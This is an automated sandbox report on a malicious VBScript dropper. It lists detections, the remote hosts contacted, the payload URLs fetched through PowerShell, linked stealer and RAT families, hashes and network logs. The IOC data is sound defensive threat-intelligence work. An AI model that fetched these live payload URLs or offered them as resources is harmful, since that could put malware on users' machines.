              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              0BO4n723Q8.vbs8%ReversingLabsWin32.Trojan.Generic
              0BO4n723Q8.vbs10%VirustotalBrowse

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              ia600100.us.archive.org0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://oneget.orgX0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://oneget.org0%URL Reputationsafe
              https://ia600100.us.archive.org1%VirustotalBrowse
              http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
              https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt10%VirustotalBrowse
              http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
              http://107.172.148.248/130/RMOTH.txt20%VirustotalBrowse
              http://107.172.148.24811%VirustotalBrowse
              http://ia600100.us.archive.org0%VirustotalBrowse
              https://github.com/Pester/Pester1%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              ia600100.us.archive.org
              		207.241.227.240
              		truefalseunknown
              241.42.69.40.in-addr.arpa
              		unknown
              		unknownfalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtfalseunknown
                http://107.172.148.248/130/RMOTH.txtfalseunknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1819764477.000001C456F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1834352585.000001C465633000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1819764477.000001C456F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://ia600100.us.arXrpowershell.exe, 00000004.00000002.1819764477.000001C456735000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1819764477.000001C456F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://go.micropowershell.exe, 00000004.00000002.1819764477.000001C456735000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/powershell.exe, 00000004.00000002.1834352585.000001C465633000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1819764477.000001C456F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1834352585.000001C465633000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 00000004.00000002.1834352585.000001C465633000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000004.00000002.1834352585.000001C465633000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://oneget.orgXpowershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://ia600100.us.archive.orgpowershell.exe, 00000004.00000002.1819764477.000001C4557E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C456735000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://aka.ms/pscore68powershell.exe, 00000002.00000002.1863528716.000001F48D33A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1863528716.000001F48D31B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C4555C1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.microsoft.cpowershell.exe, 00000004.00000002.1853033639.000001C46DAEB000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://107.172.148.248(powershell.exe, 00000004.00000002.1819764477.000001C455BCB000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1863528716.000001F48D367000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C4555C1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://107.172.148.248powershell.exe, 00000004.00000002.1819764477.000001C455A12000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1819764477.000001C456F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtKqj;79dbase64Contentpowershell.exe, 00000004.00000002.1819764477.000001C4557E2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        https://oneget.orgpowershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://ia600100.us.archive.orgpowershell.exe, 00000004.00000002.1819764477.000001C456CAC000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        http://www.System.resources%20Time-Stamp%20PCA%202010(1).crl0lpowershell.exe, 00000004.00000002.1852407179.000001C46DA61000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          107.172.148.248
                          		unknownUnited States
                          		36352AS-COLOCROSSINGUSfalse
                          207.241.227.240
                          		ia600100.us.archive.orgUnited States
                          		7941INTERNET-ARCHIVEUSfalse

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1523824
                          Start date and time:2024-10-02 05:22:13 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 26s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:8
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:0BO4n723Q8.vbs
                          renamed because original name is a hash value
                          Original Sample Name:35d62ef87119b12931f40ed80b1cf35e8b32097027f77f96d27351fbf9d4501b.vbs
                          Detection:MAL
                          Classification:mal100.troj.expl.evad.winVBS@6/6@2/2
                          EGA Information:Failed
                          HCA Information:
                          • Successful, ratio: 88%
                          • Number of executed functions: 10
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .vbs
                          • Stop behavior analysis, all processes terminated

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target powershell.exe, PID 7584 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 7744 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          23:23:16API Interceptor18090x Sleep call for process: powershell.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          107.172.148.248gwfe4fo1Sp.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                          • 107.172.148.248/130/RMOTH.txt
                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.22755.22546.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                          • 107.172.148.248/82/awss.txt
                          SecuriteInfo.com.Trojan-Downloader.Office.Doc.20731.18439.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                          • 107.172.148.248/82/awss.txt
                          207.241.227.240PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                              RFQ 2024.09.26-89 vivecta.vbsGet hashmaliciousPureLog StealerBrowse
                                AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                  sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                    asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                        LJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                          hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                                            wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              ia600100.us.archive.orgPofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 207.241.227.240
                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                              • 207.241.227.240
                                              RFQ 2024.09.26-89 vivecta.vbsGet hashmaliciousPureLog StealerBrowse
                                              • 207.241.227.240
                                              AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                              • 207.241.227.240
                                              sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 207.241.227.240
                                              asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 207.241.227.240
                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 207.241.227.240
                                              LJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                              • 207.241.227.240
                                              hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                                              • 207.241.227.240
                                              wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                              • 207.241.227.240

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              INTERNET-ARCHIVEUSPofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 207.241.227.240
                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                              • 207.241.227.240
                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtfGet hashmaliciousRemcosBrowse
                                              • 207.241.227.96
                                              RFQ 2024.09.26-89 vivecta.vbsGet hashmaliciousPureLog StealerBrowse
                                              • 207.241.227.240
                                              AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                              • 207.241.227.240
                                              REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                              • 207.241.235.61
                                              sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 207.241.227.240
                                              asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 207.241.227.240
                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 207.241.227.240
                                              http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comGet hashmaliciousUnknownBrowse
                                              • 207.241.237.3
                                              AS-COLOCROSSINGUSCEjWMdiJnR.exeGet hashmaliciousDanaBotBrowse
                                              • 23.95.182.47
                                              8CRB0iJuy1.dllGet hashmaliciousDanaBotBrowse
                                              • 23.95.182.47
                                              CEjWMdiJnR.exeGet hashmaliciousDanaBotBrowse
                                              • 23.95.182.47
                                              8CRB0iJuy1.dllGet hashmaliciousDanaBotBrowse
                                              • 23.95.182.47
                                              CANADAXORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                              • 172.245.123.6
                                              Shipping Documents.xlsGet hashmaliciousRemcosBrowse
                                              • 104.168.32.148
                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.28227.30541.rtfGet hashmaliciousRemcosBrowse
                                              • 104.168.7.8
                                              Scan Order and Specification 01-10- 2024.docxGet hashmaliciousRemcosBrowse
                                              • 104.168.7.8
                                              ORDER-24930-067548.jsGet hashmaliciousStormKitty, XWormBrowse
                                              • 192.210.215.11
                                              AE1169-0106202.xlsGet hashmaliciousSnake KeyloggerBrowse
                                              • 172.245.123.9

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              3b5074b1b5d032e5620f69f9f700ff0ePofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 207.241.227.240
                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                              • 207.241.227.240
                                              mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                              • 207.241.227.240
                                              DHL Shipping documents 0020398484995500.exeGet hashmaliciousAgentTeslaBrowse
                                              • 207.241.227.240
                                              http://tvsurf.jp/Get hashmaliciousUnknownBrowse
                                              • 207.241.227.240
                                              https://files.constantcontact.com/2d77228b901/702368a5-3f96-4cb6-b61d-aab8728be1ff.pdfGet hashmaliciousUnknownBrowse
                                              • 207.241.227.240
                                              https://sanbernardinoscounty.telcom-info.com/Get hashmaliciousHtmlDropperBrowse
                                              • 207.241.227.240
                                              OXrZ6fj4Hq.exeGet hashmaliciousNeshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWormBrowse
                                              • 207.241.227.240
                                              Pedido09669281099195.com.exeGet hashmaliciousDarkTortilla, QuasarBrowse
                                              • 207.241.227.240
                                              https://finalstepgetshere.com/uploads/beta9.zipGet hashmaliciousLummaCBrowse
                                              • 207.241.227.240

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):9434
                                              Entropy (8bit):4.928515784730612
                                              Encrypted:false
                                              SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                              MD5:D3594118838EF8580975DDA877E44DEB
                                              SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                              SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                              SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):1.1940658735648508
                                              Encrypted:false
                                              SSDEEP:3:Nlllulf66llp:NllUSOl
                                              MD5:B798C92691636A7830BE142C313C0E72
                                              SHA1:53C2A97D145573705355A8C39757DB8009D116CC
                                              SHA-256:5D6C0E321D148D9CD398B4261686BA6344F9FFF6FB4226AF1C8AEE4FB89DC75F
                                              SHA-512:6198106131F8C8083DA7946BADE71A6BB3A37474DC81E699976680CD3ACC1E84B8A151F7F8D15A79C1343BB108992D44CB98FE78593F55CE891B669EB6022106
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:@...e................................................@..........

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4auhss11.0sz.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4gv3otye.c13.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bldp1xfe.1ea.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xoywa02i.dtb.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              Static File Info

                                              General

                                              File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Entropy (8bit):3.7705724362604034
                                              TrID:
                                              • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                              • MP3 audio (1001/1) 32.22%
                                              • Lumena CEL bitmap (63/63) 2.03%
                                              • Corel Photo Paint (41/41) 1.32%
                                              File name:0BO4n723Q8.vbs
                                              File size:279'362 bytes
                                              MD5:19f9fc1579433299ad398e80b01f4137
                                              SHA1:f1ebb5f2428d32d75b5c76da93ae9f776f95303a
                                              SHA256:35d62ef87119b12931f40ed80b1cf35e8b32097027f77f96d27351fbf9d4501b
                                              SHA512:4b25c61505670cf3bea0e5275065b7efed14238ba143b8349724a935122b6e879db00ff49cb6b015fc8fd59f94771186fff22f0dc0c577787c602377b60d1ab1
                                              SSDEEP:6144:wUzkLcYZTn63w8in1dYaeDYl/Nwp8812Vja+d+N3uofQvvQ:wUoLcYZTn63w8invYbDAwj2g+4NeofQg
                                              TLSH:D554060225EA7108F1F32F6696F955F94F67B9662A39811D648C0B0F1BE3E80CD51BB3
                                              File Content Preview:..Z.i.c.L.A.G.Z.c.d.k.t.i.k.T.G.k.n.U.g.k.i.I.O.f.L.b.C.O. .=. .".z.L.G.o.U.W.W.L.L.K.a.r.d.r.c.K.J.c.S.i.z.u.C.L.i.L.i.K.".....e.o.k.G.m.j.f.b.f.c.L.h.K.t.t.A.W.s.W.m.N.i.k.W.B.O.c.h. .=. .".h.K.z.O.U.N.W.Z.P.C.x.W.U.i.L.W.p.C.i.B.c.i.c.o.G.a.L.n.".....q

                                              File Icon

                                              Icon Hash:68d69b8f86ab9a86

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 2, 2024 05:23:17.080085039 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:17.080148935 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:17.080319881 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:17.089349985 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:17.089376926 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:17.709038019 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:17.709115982 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:17.712883949 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:17.712899923 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:17.713148117 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:17.724313974 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:17.771403074 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:17.999876022 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:17.999907970 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:17.999924898 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.000053883 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.000081062 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.000149965 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.019471884 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.019491911 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.019763947 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.019784927 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.019836903 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.068098068 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.068123102 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.068240881 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.068269014 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.068312883 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.105003119 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.105021954 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.105190992 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.105223894 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.105334997 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.106077909 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.106105089 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.106182098 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.106195927 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.106209993 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.106246948 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.107759953 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.107775927 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.107834101 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.107841969 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.107882977 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.173161983 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.173187971 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.173314095 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.173347950 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.173847914 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.191658974 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.191682100 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.191787004 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.191801071 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.192064047 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.192608118 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.192625046 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.192677975 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.192683935 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.192725897 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.193068981 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:18.193576097 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:18.193593979 CEST44349705207.241.227.240192.168.2.11
